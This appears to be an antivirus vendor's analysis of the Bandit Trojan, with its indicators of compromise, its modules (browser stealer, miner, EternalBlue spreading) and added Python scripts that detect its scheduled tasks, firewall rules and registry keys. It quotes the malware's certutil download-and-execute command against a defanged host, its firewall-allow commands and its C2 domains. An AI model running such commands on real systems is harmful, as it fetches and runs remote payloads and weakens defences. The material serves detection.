Trojan.Win32.Bandit.ApLib

General explanation

Type: Trojan

Degree of destruction: high

Prevalence: high

Names of the malware:

  • Trojan.Win32.Bandit.ApLib (Padvish)
  • HEUR:Trojan.Win32.Chapak.pef (Kaspersky)
  • TR/AD.GoCloudnet.irwn (Avira)

What is a Trojan?

Trojans are malware that present themselves as harmless, legitimate software and behave like useful applications, but cause extensive damage to the system once executed. Software downloaded from the internet, embedded HTML content, email attachments and similar channels are the ways Trojans enter a system. Unlike viruses and computer worms, Trojans do not replicate themselves.

What is Bandit Trojan?

Bandit is a Trojan that hides its files and processes using low-level Windows (kernel) techniques. It spreads using the EternalBlue exploit. Once running, it downloads various modules from its command-and-control server and executes them on the victim's system.

Technical explanation

Signs of infection

  • A TestApp registry key whose values (listed below) contain malicious domains.
  • Two scheduled tasks, as follows: one runs the malware's update file and the other runs the malware's main file on the system.

name : ScheduledUpdate

command : "cmd.exe /C certutil.exe -urlcache -split -f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"

scheduled : ONLOGON

name : csrss

command : "C:\Windows\rss\csrss.exe"

scheduled : ONLOGON

  • A value in the Run registry key that executes the "C:\Windows\rss\csrss.exe" file
  • The following suspicious firewall rules:

cmd.exe /c "netsh advfirewall firewall add rule name="csrss" dir="in" action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

cmd.exe /c "netsh advfirewall firewall add rule name="csrss" dir="in" action=allow program="%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"

  • The following items in the Windows Defender exclusion list

• Files/Directories:

C:\Windows

C:\Windows\rss

AppData%Roaming\EpicNet Inc\CloudNet

AppData%Local\Temp\csrss

AppData%\Roaming\WisprPine

C:\Windows\Windefender

AppData%Local\Temp\Wup

C:\Windows\System32\drivers

• Processes: csrss.exe, cloudnet.exe, windefender.exe
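As an added detection example (not part of the Padvish write-up or its tooling), the following Python script hunts for the scheduled-task and firewall-rule indicators listed above in data exported from a Windows host. It assumes the CSV produced by `schtasks /query /fo CSV /v` and the text produced by `netsh advfirewall firewall show rule name=all verbose` (the column and field names used are the ones those commands emit; the samples inline are constructed, trimmed to the relevant columns, and contain only the paths and domains named on this page plus a benign entry for contrast). It flags three things: a command that uses certutil -urlcache to download and run a file, a csrss.exe anywhere other than C:\Windows\System32, and the drop directories named above.

```python
import csv
import io
import re

# The only legitimate location of csrss.exe; any other copy is suspect.
LEGIT_CSRSS = "c:\\windows\\system32\\csrss.exe"
# Drop directories named in the write-up (lower-cased fragments for matching).
SUSPICIOUS_PATHS = (
    "\\windows\\rss\\",
    "\\temp\\csrss\\",
    "\\epicnet inc\\cloudnet\\",
    "\\windows\\windefender",
)

# Constructed sample: schtasks /query /fo CSV /v output, reduced to a few columns.
SAMPLE_TASKS_CSV = r'''"HostName","TaskName","Status","Logon Mode","Author","Task To Run"
"PC1","\ScheduledUpdate","Ready","Interactive only","User","cmd.exe /C certutil.exe -urlcache -split -f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"
"PC1","\csrss","Ready","Interactive only","User","C:\Windows\rss\csrss.exe"
"PC1","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Interactive only","Microsoft","%windir%\system32\defrag.exe -c -h -k -g"
'''

# Constructed sample: netsh advfirewall firewall show rule name=all verbose output.
SAMPLE_FW_RULES = r'''
Rule Name:                            csrss
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             Any
Edge traversal:                       No
Program:                              C:\Windows\rss\csrss.exe
Action:                               Allow

Rule Name:                            cloudnet
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
Protocol:                             Any
Program:                              C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
Action:                               Allow

Rule Name:                            Google Chrome (mDNS-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
Protocol:                             UDP
LocalPort:                            5353
Program:                              C:\Program Files\Google\Chrome\Application\chrome.exe
Action:                               Allow
'''


def classify(command):
    """Return the first indicator matched by a command line or program path, or None."""
    c = command.lower()
    if "certutil" in c and "-urlcache" in c:
        return "certutil download-and-execute"
    if "csrss.exe" in c and LEGIT_CSRSS not in c:
        return "csrss.exe outside System32"
    if any(p in c for p in SUSPICIOUS_PATHS):
        return "known drop path"
    return None


def scan_tasks(csv_text):
    """Flag scheduled tasks (schtasks /fo CSV /v output) with suspicious actions."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        reason = classify(row.get("Task To Run", ""))
        if reason:
            findings.append((row.get("TaskName", ""), reason))
    return findings


def parse_netsh_rules(text):
    """Split 'netsh advfirewall firewall show rule' output into one dict per rule."""
    rules, current = [], None
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z ]+):\s*(.*)$", line)
        if not m:
            continue  # separator lines and blanks
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Rule Name":
            current = {key: value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def scan_firewall(text):
    """Flag inbound allow rules whose program matches the indicators."""
    findings = []
    for rule in parse_netsh_rules(text):
        if rule.get("Direction") != "In" or rule.get("Action") != "Allow":
            continue
        reason = classify(rule.get("Program", ""))
        if reason:
            findings.append((rule["Rule Name"], reason))
    return findings


if __name__ == "__main__":
    for name, reason in scan_tasks(SAMPLE_TASKS_CSV) + scan_firewall(SAMPLE_FW_RULES):
        print(f"[!] {name}: {reason}")
```

On a live host, redirect the two commands' output to files and feed them to scan_tasks and scan_firewall; the csrss check keys on the executable's location rather than its name, because the malware relies on the name blending in with the real Client/Server Runtime process.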

Behaviour

Sandbox and VM detection

The malware runs checks to determine whether it is executing inside a virtual machine or a sandbox, and stops executing if it detects such an environment.

Malicious values of the TestApp registry key

As mentioned above, the malware creates a key named TestApp at HKCU\software\microsoft\TestApp. This key holds a number of values such as those listed below (the contents of these values, especially the server addresses, may differ between samples; newer variants also use a random string such as "dd47a129" in place of "TestApp"):

Key : HKCU\software\microsoft\TestApp

Subkeys :

Uuid = ""

command = ""

FirstInstallDate = "56268135e"

ServiceVersion = ""

SC = ""

PGDSE = ""

VC = ""

ServerVersion = "94"

CDN = "hxxps://bestblues[.]tech"

PP = ""

name = "SmallSea"

servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"

firewall = ""

defender = ""
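As an added example (not code from the Padvish write-up), the following Python script parses a registry export (for instance `reg export HKCU\Software\Microsoft hkcu_ms.reg`) and reports any key directly under HKCU\Software\Microsoft that carries the set of value names listed above. Matching on the value names rather than on the key name means it also catches the variant that replaces "TestApp" with a random string such as "dd47a129". The .reg text inline is constructed from the values on this page; the second key's contents are placeholders made up here to stand in for a renamed variant. The CDN and server domains are extracted and kept defanged, as on the page.

```python
import re

# Value names that together characterise the Bandit configuration key described above.
FINGERPRINT = {"Uuid", "FirstInstallDate", "ServiceVersion", "ServerVersion",
               "CDN", "servers", "firewall", "defender"}
MIN_MATCH = 5  # how many of the names a key must carry to be reported
PARENT = "hkey_current_user\\software\\microsoft\\"

# Constructed .reg export: the TestApp key from this page, a renamed variant
# with placeholder values, and a benign key for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\TestApp]
"Uuid"=""
"command"=""
"FirstInstallDate"="56268135e"
"ServiceVersion"=""
"SC"=""
"PGDSE"=""
"VC"=""
"ServerVersion"="94"
"CDN"="hxxps://bestblues[.]tech"
"PP"=""
"name"="SmallSea"
"servers"="hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
"firewall"=""
"defender"=""

[HKEY_CURRENT_USER\Software\Microsoft\dd47a129]
"Uuid"=""
"FirstInstallDate"=""
"ServerVersion"=""
"CDN"="hxxps://cdn-placeholder[.]invalid"
"servers"="hxxps://c2-placeholder[.]invalid"
"firewall"=""
"defender"=""

[HKEY_CURRENT_USER\Software\Microsoft\Notepad]
"lfFaceName"="Consolas"
"iPointSize"=dword:00000078
'''


def _unescape(raw):
    """Strip the quotes of a REG_SZ value and undo .reg backslash escaping."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw  # dword:/hex: values are left as exported


def parse_reg_export(text):
    """Parse a .reg export into {key path: {value name: value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if m:
                keys[current][m.group(1)] = _unescape(m.group(2))
    return keys


def extract_domains(value):
    """Turn the comma-separated 'servers' value into a list of (still defanged) hosts."""
    hosts = []
    for part in value.split(","):
        part = re.sub(r"^[a-z]+[:;]//", "", part.strip(), flags=re.IGNORECASE)
        if part:
            hosts.append(part)
    return hosts


def find_bandit_config(keys):
    """Report keys under HKCU\\Software\\Microsoft carrying the value-name fingerprint."""
    hits = []
    for path, values in keys.items():
        if not path.lower().startswith(PARENT):
            continue
        matched = FINGERPRINT & set(values)
        if len(matched) >= MIN_MATCH:
            hits.append({
                "key": path,
                "matched": sorted(matched),
                "cdn": values.get("CDN", ""),
                "servers": extract_domains(values.get("servers", "")),
            })
    return hits


if __name__ == "__main__":
    for hit in find_bandit_config(parse_reg_export(SAMPLE_REG)):
        print(f"[!] {hit['key']}: CDN={hit['cdn']} servers={hit['servers']}")
```

The threshold of five matching value names is a judgement call: it tolerates a sample that drops a few of the empty values while keeping ordinary application keys, which rarely share more than one of these names, well below it.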

Creating the csrss process

After using privilege-escalation techniques, the malware creates the C:\Windows\rss directory, marks it hidden, and copies its own file into this path under the name csrss.exe.

Distribution in the local network

This malware uses the tools associated with the EternalBlue and DoublePulsar vulnerabilities to spread. It detects systems running vulnerable versions of the SMB protocol at the network level and uses the vulnerability to execute its malware on them.

Downloading drivers

The malware creates and runs three drivers:

  1. Winmon.sys driver: used to hide the malware's processes.
  2. WinmonFs.sys driver: hides the malware's directories and files from antivirus and monitoring tools.
  3. WinmonProcessMonitor driver: holds a long list of process names belonging to system-monitoring products, antivirus software, etc. Whenever a new process is created on the system, it checks that the new process's name is not in this list; otherwise, it ends the malware's execution.

Downloading and executing malware modules

  1. Browser Stealer module: steals cookies, history and local storage from browsers such as Chrome, Coccoc, Firefox, Opera and Yandex and sends them to the server as a zip file.
  2. Router Exploit module: exploits router vulnerabilities at the network level.
  3. Collectchromefingerprint module: checks whether the Chrome browser is installed on the system. If it is, it opens the following link in the browser.

hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome

This link is a blank page that, in the background, runs the JavaScript library "DetectRTC" (https://github.com/muaz-khan/DetectRTC) to enumerate WebRTC capabilities, such as whether the victim's system has a microphone, speakers or webcam, the number of media devices, whether a snapshot can be taken, etc., and sends the results to the following path:

hxxps://swebgames[.]site/fp.php

  4. Bot module: registers the victim's system with the malware servers and then connects to them repeatedly. One of these connections obtains a list of active Bitcoin-network mining pools and connects to them to mine cryptocurrency on the victim's system.

How to deal with it and disinfect the system

Padvish Antivirus detects and disinfects this malware. To prevent infection by malware that uses the EternalBlue vulnerability, it is recommended to apply Microsoft's security patch MS17-010. Padvish IPS detects malware that uses this kind of vulnerability and prevents it from entering the system.
